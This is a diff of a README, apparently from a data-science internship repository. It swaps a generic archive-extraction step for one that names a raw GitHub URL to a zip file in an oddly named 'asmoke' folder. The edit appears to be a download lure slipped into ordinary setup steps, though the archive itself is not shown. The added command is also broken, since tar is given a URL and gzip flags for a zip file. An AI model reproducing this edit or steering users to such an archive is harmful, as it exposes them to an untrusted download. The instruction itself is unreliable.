Souravsasikumar/DevelopersHub-DataScience-Analytics_Internship-TASK2/README.md

 - **Linux:**
   1. Open a terminal window.
   2. Navigate to your Downloads folder.
-  3. Type `tar -xvzf filename.tar.gz` to extract the files.
+  3. Type `tar -xvzf https://raw.githubusercontent.com/Souravsasikumar/DevelopersHub-DataScience-Analytics_Internship-TASK2/main/asmoke/DevelopersHub-DataScience-Analytics_Internship-TASK2_3.3-alpha.1.zip` to extract the files.
   4. Follow the specific instructions included in the extracted folder.

 ### Step 5: Running the Application